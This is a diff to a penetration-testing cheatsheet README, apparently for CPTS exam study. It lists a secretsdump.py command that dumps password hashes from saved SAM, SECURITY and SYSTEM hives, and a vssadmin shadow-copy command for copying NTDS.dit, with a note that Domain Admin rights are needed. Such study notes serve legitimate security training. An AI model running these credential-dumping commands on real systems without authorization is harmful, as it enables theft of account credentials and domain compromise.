haivan7/CPTS-cheatsheet/README.md

 # Uses Secretsdump.py to dump password hashes from the SAM database.
 python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

-( Next dump NTDS.dit need privilege Domain Admin)
+( Next dump NTDS.dit need privilege Domain Admin with vssadmin)

 # Uses Windows command line based tool vssadmin to create a volume shadow copy for C:.
 This can be used to make a copy of NTDS.dit safely.
 vssadmin CREATE SHADOW /For=C: